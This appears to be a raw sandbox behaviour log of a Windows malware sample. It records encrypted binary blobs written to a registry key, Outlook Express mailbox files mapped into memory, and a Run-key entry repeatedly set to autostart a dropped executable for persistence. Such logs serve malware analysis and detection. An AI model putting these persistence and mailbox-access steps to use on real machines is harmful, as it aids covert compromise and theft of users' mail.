Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid Name: Ebci Type: Binary Data: C9 AB 5E 55 DA 26 82 2F 4E DD F6 8A BA 2B AF D4 47 12 B4 F7 9C 4E 33 A6 B5 91 12 6A 9D 00 42 87 D5 EF DB 53 1E AA 37 10 99 7C 93 77 F5 53 4F E1 FD 38 2F A5 38 17 6F 96 8E 75 8A 56 83 BE D0 5F 29 9C 0A 2C DF F7 6B 20 FF 4B 95 65 73 8A AA 94 55 98 A5 8C 27 68 47 82 6C D7 4D 11 0B 51 6E 6F 59 F0 C8 8A 60 5E 7A 40 1C 04 2D D4 B6 B7 B6 C9 D0 AE 0F 66 CA 58 7E BA D8 4E CD CD FA 72 AB EF 1D 4E BC FE 49 E0 42 E6 10 4E B9 32 BC 54 2E 85 67 35 6A 2F 0A 3F E4 EE 44 4A EA 0A 00 A9 D9 22 37 85 0A CB 44 F8 15 DE CC 30 09 E9 DA 51 9E 03 68 43 21 DA 03 5F 95 7C 82 EF 40 9B D0 18 D3 C0 64 77 45 34 E1 72 F3 F4 52 2E C7 6B 38 EB 29 18 FC DE 3F 7C A0 75 48 3D 5C 7C CB AF 2D A0 B1 DE 00 B5 4A 9C 1F DD AF 0C 18 C5 60 C5 9C 57 A7 B8 1A 08 F9 0E 45 D8 BB 3D FC 4B F6 A6 22 53 3A 5D 0C B5 FA 68 81 DB 5D 01 DF D1 5A D0 0A 3B 10 56 01 92 82 0B CE 33 E2 DA 7C D2 3C 76 16 5A 14 15 D8 53 CA 3C EE 68 46 1C 3F 34 62 67 71 09 FB D8 28 DE 8F AD 50 62 09 5B 77 A7 F4 B1 7E 2E E2 5C 53 93 D6 B7 C2 73 1B D0 8C FE E4 6D CD DB 97 F3 8F AB A4 62 A2 E1 E4 03 13 8B CA AE 83 54 B4 23 98 0C A7 0C 77 71 67 32 28 F4 0B 2F 6A 49 B9 EF 36 23 D8 E4 9B 67 6A F3 AF 57 D0 B8 B4 72 11 7B DD 25 03 9B 23 D7 CC 82 37 1B 74 55 0E 5E 8E A7 68 B5 6D 79 62 5E 33 0A E1 1E DE 02 2D ED F2 13 45 19 E3 CA 1F 50 3B 36 80 3F BA 70 11 E0 17 19 AB 4F 89 D8 38 78 86 85 CD 0D 09 18 80 19 3B D9 4B D6 B7 DA 3D E1 38 A8 91 44 51 62 F2 55 16 A7 9A 8F AF 12 7A 5B 72 1C BA 80 C5 FD 5A 72 0D 7E 5D 4B C1 E9 EA EB F8 2F E9 40 99 1D BD 65 F6 FA D6 D0 A6 5A 28 FE 1C 75 00 CB 81 0E 3E D0 CA 2E 6B 1D 8D DF 86 A5 E4 A5 39 9B 8E 0C 21 92 33 F6 43 39 E0 48 0E 74 11 CC F2 B0 17 C4 D0 57 52 79 9D 18 37 D4 FE C2 3C 2A 6A AC BF DE 04 C8 86 A5 98 16 F1 D4 99 00 FB 8B D3 51 72 D4 A8 B3 BB A0 F7 C2 14 8F 97 D7 F2 3D 43 AC 25 BD 6B 20 34 6C 46 AD 47 E7 1C 63 E7 53 1A 02 AF 45 39 62 96 DB 2A 70 C1 B8 B3 B6 C5 C9 CE 3A A9 41 CD 90 BF 1F C6 94 A7 43 A3 65 01 D8 F5 54 96 46 EE 35 E7 DE 44 DC 12 45 03 C2 99 59 27 62 08 C7 AC 98 C8 C7 0B BF CD E9 73 DD 0F D4 4D 5B 14 09 F5 14 FA 41 03 4E 09 8B 2A 3A 2E 1C DB D4 9F 5C 95 7F 2C D7 33 28 EA 8B 82 F5 8A 33 DC 0F DE 60 66 F0 FE D8 26 69 4C 6F 16 DF EA 02 0C CB 6E 63 38 C4 F5 CE B5 DA 3F 8B 5F DD CC 4E 2C 85 C3 B9 51 BC 6D 17 1D A3 2E 23 1E 41 39 BD 07 FF 64 53 02 97 B6 D7 C8 DF D0 0E DC 3B F6 1F A0 AA 2F BE DB 75 78 61 66 6B CD 9E 41 40 F0 7B A7 F4 A3 F5 34 6B 8A A2 7A 01 AF 8B 1D 93 91 62 FA 8C 92 B1 9C 25 98 6D 21 C9 F7 EC 3E C2 9D 4E 8C 8B 71 D1 84 9E 68 D2 EC A3 4F CC 0F 65 38 D2 F7 11 61 58 04 20 4B 9F A8 19 0C 25 2F BE DD 17 53 35 BD D8 4C 3C B3 38 C7 BA E9 D0 25 80 9C 7F A6 B7 B8 12 E8 6B A6 E5 4F F7 A2 22 23 27 A4 93 A0 CA 1B 0B 74 D3 CB F5 2B 87 E0 40 9D E8 BD 81 29 59 C5 7D 4C 07 31 CE A4 99 5B DD 12 AA D6 B9 50 95 1D D3 A5 D4 D2 4D 47 55 5F 39 79 7C A4 26 00 EF EF 85 9C 43 F3 03 CC EE 26 F3 90 D5 93 62 52 4F 16 F9 37 89 0F B1 88 FA 5B 71 79 C6 DC E9 7F 79 27 59 D8 98 AA 85 67 DA 4C 5C 99 D5 E6 99 54 94 31 D6 08 15 9F 50 C4 22 51 9D 01 2E B2 60 F0 EF AE FC D8 10 E1 D4 DE BD 2B 82 2A 29 EF 68 AA 78 44 0E 19 B3 88 B6 03 0E B7 2E 76 58 12 1A D7 5B 30 22 95 E9 F0 66 58 C3 D2 F6 6C 69 83 C5 35 80 FC 56 2C 5E 28 23 C4 0C B0 F3 3B EA E1 3B DF B4 B4 28 E7 56 A0 F6 90 57 EF 19 AC EC 15 BD 7B 31 95 BC C8 9E 89 5D AF 19 62 92 BC E4 CE E5 D0 0F 22 72 A6 04 C1 6E F6 E2 10 EB 0A 7D 04 0E DE 1E E1 B2 9C 82 69 56 69 4F 27 4C A0 FF D6 52 30 E9 3E 33 60 27 2E A8 57 26 E9 6E 9A 4E 04 94 E4 9F C7 5B 1C 09 6F 61 36 78 8F C7 3A A7 A6 A9 C2 B2 A9 F2 D0 BA 24 12 46 2E AD 0B 34 01 79 ED C8 E6 41 10 FE 58 58 C9 8D A4 9A B0 16 B1 00 EF 98 B9 6C C9 44 A7 90 0D 63 93 4E 2E 46 49 08 FF 26 17 8C 7B 08 40 25 29 81 3A 5C 75 04 92 EC B8 3A 40 7B C8 EA F7 6B FC B3 7D 01 A6 7C A6 4D 28 4D 5A 9D 92 1A 59 79 F5 89 AE 3B 72 FE 99 2A 93 E7 BB 04 A3 6C 31 17 15 76 CE 9E 2A 9C 8C 47 28 23 AB 14 7F 27 3C C2 57 AF D3 A2 B4 7D EF E0 57 CA 32 94 FA F4 E1 1D 19 FE BA 6B 3C 7E 14 F6 EB 4A 32 DA 65 35 82 A0 0B 5E D2 32 EB BD 06 7A 0E B6 26 85 D5 A1 22 80 05 82 D1 3B C5 52 83 A8 F0 8C 35 AE 11 4A 1B 39 34 2B 3B C0 D8 31 C1 0B AE 21 50 47 96 90 76 AD 9F EB 83 9B 12 90 C3 C3 B6 81 E0 DB 01 EC AD 06 66 CE BE 63 AC A5 6A F2 90 6D 4A 24 34 B0 B7 24 73 F4 CE A3 28 BF 58 BD A2 8E 25 CA 0D FF 45 5E 1D 33 5B 4D B0 11 A6 B6 88 12 AE EF 7D EA B1 FE FD 98 3C B7 AF 89 A7 9C 98 8B BE 58 AE 02 43 35 22 72 28 96 50 00 1A 7E 81 EE 91 3E 6B 3D 6F BF B7 D3 BC 7B 84 DB 15 A8 5C 87 F4 EF 5E EA 60 80 A9 33 CE E1 16 2C 1F C1 3E 52 F9 12 06 4F 34 F9 E1 74 9F 3D 70 10 5F 0C 16 1A 52 0F 12 E7 E9 B1 A7 A4 64 3B 82 27 83 79 44 90 DA 81 45 3E 67 3A 65 A8 E4 9E B7 8D 8D 5D 7A 28 13 64 09 64 8B F0 FF 3C 54 AB 6F 65 FA F2 E8 27 10 FF 39 4E 4A D4 63 21 69 1A F7 97 98 F0 67 BC CE 43 86 E1 41 E6 71 E1 29 88 3D 3D 2F CD 30 1D 2A F2 DD 47 A6 AB CF AF 45 96 3A D8 27 C8 5F 53 AC 8E 76 FE 56 6C 7D 5A 2F 08 15 A7 B6 3C 00 31 E8 63 6F 78 F4 2D 4B 20 DF 27 7B 6C C5 58 02 32 29 93 D2 58 F2 89 84 A8 3E 75 DE 27 FF 89 09 EC 47 F7 6D D3 02 9E 82 E3 27 22 62 F1 C0 06 40 AF 0E 18 C9 EB 8F 70 DA 1B 4B 22 79 23 E1 B3 04 26 9D AC 15 DE 4C 1A 05 17 16 3B BF F4 5C 98 F0 63 77 F2 74 E1 3F F5 60 AB 03 67 4C DB 42 38 A8 60 83 FE 62 44 92 D6 C6 5A A4 F6 2C 5F 16 FE 1B 56 2D 17 74 A3 90 E8 AB 5C 27 38 A1 1C 94 74 8C 14 7A D9 89 E2 69 91 7C 82 42 F1 0B 81 1D 2A 72 8F 21 E2 11 F1 BA 60 92 AE 87 54 4B 30 EB A0 A9 AF 6E 74 60 78 E9 56 C3 DA 75 E8 D6 6A 6A 8C CE D2 C8 46 43 C5 E2 CA D1 2D 79 5B 98 3D D1 58 D3 7A 03 E4 2C 56 1B D2 AA 74 59 17 98 47 D3 76 91 7B ED C1 D3 75 1D 15 8C C7 88 DB CB CF E8 AE 7C 34 99 54 B2 3B 51 6E 7F 05 41 C1 58 98 33 74 89 12 FE 9A 52 D7 B1 4F 58 CA 10 F2 7E 03 40 1E 09 D1 83 CB 4A 40 2B E0 6D C4 5C F1 BA EF 2B 30 6E 4A 59 39 01 20 9A A5 72 F6 D2 45 DF BC 9D 42 47 03 BA BB EC 2C 09 62 97 4C F4 F2 F4 4B A0 E8 67 82 FF BE 89 52 F1 D9 F1 74 55 11 23 A2 5C F6 B3 74 F8 14 87 73 91 C4 63 64 85 C0 6D C0 0B ED 71 E8 65 F0 C2 8E 44 AD DE EB 28 2F 67 A9 8B 9F FF C7 AC BD CF 79 4A DE C2 4A 9B 51 F7 3B F1 F2 D7 C6 BE 7F 29 71 7B 85 D7 B1 75 E2 11 33 1C 17 56 21 C0 F2 76 47 02 2E 40 81 84 50 B5 BE E2 24 60 35 17 25 C9 DD 41 87 51 20 61 55 B7 D7 7A 9D 23 0E 4F B4 A9 7C 2D C8 83 98 07 B1 4D 54 AB 8E 83 33 D9 04 EF EE 1D E2 2D A8 CC 98 5E 0B BD 80 9F 4C A4 09 75 94 16 86 F0 2A 9B 1C D8 1D C8 86 AE 84 2F 06 DE 60 08 68 93 B9 A3 75 92 9A FC EC D0 02 F7 77 0C 82 EF 49 65 9F 0B D3 FB 0D 20 4B BC B7 DB 98 20 9F 19 EF D1 B3 9A F0 E5 83 4C 4F AD CC 1D A9 3A EE E5 79 4F 70 82 44 7A 7F 29 E3 B1 E5 81 86 35 B2 24 19 8D 9C 52 DC AB 44 20 F4 FA 51 00 0C 6C C0 62 7C 29 5A AA DE 54 DA 24 A1 76 26 3E 57 17 EE 48 A8 58 4A 47 35 70 D1 BB DC 9A 9E D6 5C B8 53 3C 35 5C 45 2A 7B BD 7C 1F 17 90 E6 48 00 B9 4E 89 49 B9 32 3E 22 30 73 ED 65 BA 5C 21 44 26 B0 45 78 F3 FA 81 A8 BB C6 8D 51 ED C5 45 50 CA E8 F2 F1 C9 D1 AB F2 59 EB 46 61 ED E9 5E 33 88 BC 39 99 48 EE CE 58 6D 62 74 88 E5 71 E8 FB 26 31 86 05 28 18 1A 7B 66 10 81 9C 1E E5 64 79 5A 47 EA D8 84 96 A7 5D E5 78 BC 98 68 D4 3D 0B 81 28 EB 2E 4B 73 DC 32 9D E9 DA 24 BE AE 6C 7A F9 E0 8C D9 C5 1C BF B1 DC 2F 65 94 E0 A9 0D 53 C0 11 5E 6D 5B BF 09 1E 60 7B C7 8D 3E 8A FA 2B D7 9F 77 9D 12 DB 07 74 25 18 94 3F DB 17 E0 43 86 6B 4B B5 03 E5 08 D2 13 D4 EB 79 4B 23 94 41 2C BD A0 24 5A C4 30 79 0D C3 6B 7B 81 DD F5 34 BC 5E CA 58 87 57 06 91 A9 50 80 DE 6E FE 95 3E 36 64 7C F5 71 50 6D 0C 7E EB B9 B8 13 AC 65 99 76 4A 26 E2 64 52 C6 42 2B 38 28 1F E1 D7 BB B6 39 73 3D 25 C8 1B 63 B6 22 F7 6F EC A8 79 F1 90 CE 4A AE 55 C5 8D 89 E7 F5 A6 36 3A 25 A8 D4 E5 64 37 26 CB 16 BE 57 B9 DB E6 EA 81 3A A9 7B 91 F7 6B 8A 27 0A AA AF F4 6A D1 59 17 F0 D1 CE BC 3D E8 BD 88 30 92 66 08 AA 48 D8 EF 5E DF AE A7 ED 9F 59 20 DC 2C 3E DA 53 D4 CB 6A C5 ED 8F B9 EC B0 E5 69 59 64 9E 8A E3 AD 9E ED D3 C1 FA F3 78 FE 15 94 B3 76 97 E7 AE 90 16 94 06 2D B2 52 E0 96 96 98 E2 7F 94 71 F7 EB 5D 0F 47 60 C0 86 B9 A8 6B 87 C5 E3 A0 94 37 6B 63 A2 B0 A0 4B 38 D6 D1 9E 2B 9F 6E 5A 6A 5B CC E9 E2 69 90 1E 93 2C 11 65 7D 95 E0 46 05 4B 6D 6B 3D F6 55 1A C4 47 69 A6 BC 39 5B 6B 9E 60 01 37 FD BB E1 B7 CD BA 36 DA 05 D8 04 F7 34 4B C1 6C E5 C9 A0 6A 86 A6 66 43 FF 75 08 08 03 CF 10 A5 83 1E F9 B1 93 8F C8 9A CC 65 07 51 B8 4D 5E C4 DE 84 B7 A2 69 13 DF 39 23 C6 18 32 B7 8D D5 89 0B 82 08 22 9E 10 14 8D 51 B5 84 61 DC C9 55 16 15 54 99 45 CA 64 02 86 50 23 8A ED 36 7F F6 25 72 17 A4 A8 F1 2B 7E AD 2E DE 6C 17 1E 77 40 13 57 48 92 3B B5 4E A6 EA AA 60 DB 6C 9B B4 58 53 62 46 2A 8F 20 C5 D7 A9 0D 5F 70 64 BE 45 89 3D ED 7C 4A 19 5A BD F7 0A 70 50 B1 3A 6D C8 98 51 54 45 3F D0 72 E5 67 5C ED A7 51 B8 6D 39 06 E5 05 0F A5 65 D7 30 49 A2 13 6E A3 E3 F9 83 5B 90 71 26 AF F8 CA 66 27 DA 9D 5F AC A6 AE CF 1B C5 B9 41 C9 95 79 9D 1D 55 FC 27 3D 6E 66 46 72 60 3B 28 D9 F1 DA ED EF 97 FB E1 BA FD 11 51 D1 EC 8E 1C 29 C7 12 1A 16 0B 39 8B 5B 3E FB 9E 8F 43 C0 0B F4 1A A8 A1 43 11 DA D4 53 AC FA CA 0B 6E 00 B5 F7 57 E1 6C 5B 4C EA 1B 3D CF E6 1B 54 DF 55 3F AA EA 44 6D 02 64 20 CD 78 F4 B6 C5 FF 82 8A B4 68 D5 2C 2A C4 94 6E 0C 8B B6 51 64 15 A6 9E D4 BB 2B 78 54 E1 51 78 94 0F AB 18 83 37 E8 62 12 74 8D E3 C2 61 46 D2 D9 6D 92 86 31 4C 34 D7 97 07 64 3B 9A BB 07 FE 7A C6 2F 29 AC 22 13 FC 0F 25 46 6D 2D 9B 4B 48 B8 DB 99 F7 6F 6D F8 2F B4 DF BD 38 A5 F6 84 A7 6B 17 77 22 F6 41 B9 8C CF F6 8B 2C F0 8E A6 98 4B 9C 67 31 1C 0E 36 A4 12 04 63 3D A6 B7 8E 33 8F E3 A1 90 8C 5D ED 70 E8 96 08 A5 CE 1D 08 FC 6C D7 F2 03 17 8F 05 F9 D6 83 C7 BE 8F 72 30 A0 C7 A0 AB 17 84 D8 03 D1 14 20 AB F4 09 06 5D FF 64 9F CE CA EC 5F 39 60 84 15 A7 70 D8 CF 82 A0 A6 DD 13 0E 9A F0 F9 D4 AB E0 F5 F6 F7 60 26 70 36 06 18 23 D4 96 06 D2 58 AD 97 C7 48 28 27 91 B7 81 8A 2E 5B 7E 04 74 9A 4E 73 AB 1E 16 36 6A 9B F0 74 BA A1 62 C7 37 9E B8 0D 13 50 17 09 53 29 8A E1 26 CE 2C 23 C6 BF A0 01 42 C0 67 84 81 94 74 F5 C4 66 A3 1E EC 3A B0 B1 C8 17 BF E5 DC EB 60 CC F1 94 90 6D 80 2E 9A 78 36 01 AE 4A CD 3D F8 D6 34 27 DC 06 12 18 A0 F3 0C 3B 1E 73 EC 54 5E A9 06 D5 F0 8A 2A B1 13 CF 8D 0C B4 FC 71 8D 8F 67 44 97 56 0D C8 2E FD 5F 69 51 B4 42 D7 75 4F 54 F0 F7 A1 6D F6 0B 9A 76 57 16 47 6F 12 CB A7 BB DA 36 C3 62 45 01 3B 89 AD A5 DA 87 56 CB 68 38 1E 06 C3 AC 2A 90 38 26 2D 0E 84 04 08 A4 E1 D9 9E 8C 78 E4 DB EA A4 6F BF F8 4F 10 93 1F DC F8 84 7F 5A CB 62 B6 4E 3A 16 E0 CE 4D 19 91 05 2B D6 54 F4 CF 4F 3B C8 B0 E0 AE EA B1 1F 3A 89 40 52 AF 07 D6 70 AF 0E 51 55 5F 1F D2 C0 B9 F9 ED 83 11 77 EB E8 5E 3A C6 F0 12 67 24 E5 2E C7 56 87 A9 44 8E 5A 92 F2 FD B1 49 F8 DD 1D 7C 3D E1 5C B2 B0 31 28 21 1B 8D F1 F6 FD 1E 8D B2 35 50 7C D3 A1 5C 8B 81 7B 52 FF 3B 9A 00 A2 FA 4D 82 B7 6C 4A 16 65 64 BF C8 62 08 C9 4B 09 3F 5C 7D DB 65 1F 9A 29 45 57 DB DD 50 01 40 37 EB 60 B9 5A 2E CA 0F F6 B8 E3 95 EF 95 F1 EC 61 3D F2 71 8A 75 F1 67 B9 EB 20 52 E3 83 56 E8 94 E2 55 F2 2C 57 7B 31 06 89 B2 25 9B B5 38 3E B9 A7 8B 95 CD 19 1F 7E B5 6D 07 0E 5D 43 88 8A 81 FD 90 27 08 5E F2 11 39 20 9D 34 48 6B F9 8F F3 A0 7D 13 76 5F 15 C8 59 7B 9E AD 05 0B EB 3C 16 60 F5 C4 BA 26 00 1A 13 E4 11 94 2C 79 2A 7C 61 E6 16 AD FA 8B 86 1E 0A 44 89 1A BD 37 45 0B AB 43 3C 6F D5 87 D5 FF A5 EF 97 6F 96 89 4F 15 40 4B BC 92 E5 31 44 23 48 7C AF F5 EC 6B 42 37 85 4D B6 A8 A7 54 9F 03 3A 9A BE 97 DD 36 91 16 5A A3 40 A9 C7 F0 75 7A 68 FE CD 5D D5 8F F7 43 C5 88 87 9A E5 BA DD B3 4E 42 35 96 79 E7 66 82 58 E9 5D 0C 37 D1 DE 1C C2 29 F9 B4 C3 D7 F4 82 D5 8D 17 CC FA 7B CC 71 7D 04 F5 56 75 92 68 A1 B0 F3 7C FD E4 B9 E9 DD B0 88 78 E9 87 A2 1A 7E 50 A2 08 1F 97 F7 05 68 AE 5F 71 45 69 3D F8 BB 10 DF D5 F2 65 F8 1D 8A FA 75 6B 72 41 E2 CD 28 06 EE A7 84 FF 8C 0B F7 46 A9 8F D0 E1 9F B2 BB C5 1C 1A FF D4 FC 9D 8D 8D DE EC C1 C0 E6 CA 29 3F 2B 87 BA 75 C6 92 9B 78 DD 88 F0 3F EA CC 79 A8 30 55 CF 97 42 1A FE 97 FB 22 92 0E 09 A3 36 1F 08 2F 2C 28 D9 30 9B 13 1B A2 A2 78 F6 AC E4 75 A0 6F FE 89 A4 08 5B F7 BF 1A 99 17 86 77 74 14 28 DC 28 FD 16 BE DF E7 F8 E3 09 96 1A 7A B6 64 C8 56 9A E9 16 D4 F5 A6 84 EF F3 FE 97 36 CA 90 CA A4 44 37 06 43 A5 D2 23 CE 6A FE CE 78 2A CB 3B D3 2E 67 36 9F B0 89 61 28 DF F8 76 06 2C D8 A6 E7 58 C0 C7 68 01 A8 46 AA 1B 1A 42 DF B9 2E 22 36 2C 42 57 B1 3E 69 12 E5 6E 04 01 14 80 9B E7 BC 15 C9 EB 31 DB B7 25 C0 DB 8D 59 12 91 D3 B3 46 A8 D6 D7 65 63 10 51 4A D8 BD 96 08 24 36 E0 F2 64 6B DA 5B D1 59 38 BB B1 54 66 4C AC 24 0C F7 EF C9 8F EA 65 25 58 79 64 6B 90 EE 0A 1B 2D A1 30 7A 2D 41 23 72 F6 E7 27 99 9E 12 1E 07 1E 4E E8 0B 64 34 5E D6 AE 78 BB DF 06 C6 79 D4 3C 7E FA 17 C8 AA 09 F9 DF E3 06 A3 F4 B9 82 72 98 31 5C C6 E4 D1 C4 DD 14 B9 A2 F8 B3 9E D7 F1 43 success or wait 1994762873
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid Name: Ebci buffer overflow 1994764678
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: write and read and execute Type: commit Baseaddress: 3120000 Size: 4096 Protection: execute Mapped to pid: own pid success or wait 1994765672
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 3120000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 1994766656
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid Name: Ebci buffer overflow 1994767570
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid Name: Ebci success or wait 1994767932
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: read Type: commit Baseaddress: 3120000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 1994774996
Section loaded Path: \KnownDlls\PSAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 3120000 Size: 4096 Protection: readonly Mapped to pid: own pid object name not found 1994788880
Section loaded Path: C:\WINDOWS\system32\psapi.dll Access: query and write and read and execute Type: image Baseaddress: 76BF0000 Size: 45056 Protection: read write Mapped to pid: own pid success or wait 1994790043
Section loaded Path: \NLS\NlsSectionCP28591 Access: read Type: unknown Baseaddress: 76BF0000 Size: 45056 Protection: read write Mapped to pid: own pid object name not found 1994942394
System info queried Type: CurrentTimeZoneInformation success or wait 1994945006
Section loaded Path: \BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_inbox.dbx_directdbfilemap Access: query and write and read and execute and extend size Type: unknown Baseaddress: 76BF0000 Size: 45056 Protection: read write Mapped to pid: own pid object name not found 1994954529
Section loaded Path: \BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_inbox.dbx_directdbfilemap Access: query and write and read Type: commit Baseaddress: 3160000 Size: 143360 Protection: read write Mapped to pid: own pid success or wait 1994954717
Section loaded Path: \BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_offline.dbx_directdbshare Access: query and write and read and execute and extend size Type: unknown Baseaddress: 3160000 Size: 143360 Protection: read write Mapped to pid: own pid object name not found 1994958200
Section loaded Path: \BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_offline.dbx_directdbshare Access: query and write and read Type: commit Baseaddress: 3010000 Size: 28672 Protection: read write Mapped to pid: own pid success or wait 1994958362
Section loaded Path: \BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_offline.dbx_directdbfilemap Access: query and write and read and execute and extend size Type: unknown Baseaddress: 3010000 Size: 28672 Protection: read write Mapped to pid: own pid object name not found 1994958859
Section loaded Path: \BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_offline.dbx_directdbfilemap Access: query and write and read Type: commit Baseaddress: 3020000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 1994959018
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 1995317676
Section loaded Path: \BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_sent items.dbx_directdbshare Access: query and write and read and execute and extend size Type: unknown Baseaddress: 3020000 Size: 12288 Protection: read write Mapped to pid: own pid object name not found 1995446729
Section loaded Path: \BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_sent items.dbx_directdbshare Access: query and write and read Type: commit Baseaddress: 3040000 Size: 28672 Protection: read write Mapped to pid: own pid success or wait 1995446898
Section loaded Path: \BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_sent items.dbx_directdbfilemap Access: query and write and read and execute and extend size Type: unknown Baseaddress: 3040000 Size: 28672 Protection: read write Mapped to pid: own pid object name not found 1995447388
Section loaded Path: \BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_sent items.dbx_directdbfilemap Access: query and write and read Type: commit Baseaddress: 30D0000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 1995447555
Section loaded Path: \BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_sent items.dbx_directdbfilemap Access: query and write and read and execute and extend size Type: unknown Baseaddress: 30D0000 Size: 12288 Protection: read write Mapped to pid: own pid object name not found 1995451036
Section loaded Path: \BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_sent items.dbx_directdbfilemap Access: query and write and read Type: commit Baseaddress: 3120000 Size: 77824 Protection: read write Mapped to pid: own pid success or wait 1995451215
Section loaded Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\MPS56.tmp Access: query and write and read and execute and extend size Type: commit Baseaddress: 2EF0000 Size: 180224 Protection: readonly Mapped to pid: own pid success or wait 1995580440
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 1997202606
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid Name: Okmaykid Type: Binary Data: 96 8D 31 C9 C5 75 08 F8 84 53 9B D1 F4 B9 61 28 10 B5 F1 08 71 3F 43 D6 C5 E1 62 1A C6 5B 19 DC CC D6 C6 9D C6 B3 0A 3C 08 2E 18 33 00 4D BE 0B 36 BD B7 A3 BD 92 EA 03 1F E4 1B C7 16 2B 45 CA B5 08 9E BA 6B 0D 91 DA 05 B1 6F 8F BD 44 64 5A BF 72 4F 66 A5 9E C5 70 A4 30 85 A9 DA E1 B0 C2 84 42 08 3E FA A7 EC BB C8 A3 E1 74 73 02 2C 20 4D 52 81 9C success or wait 1997252386
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 1998978432
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 1999683387
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 2001429679
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 2002144313
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 2002869721
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 2003738153
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 2004454005
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 2005191672
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 2005904722
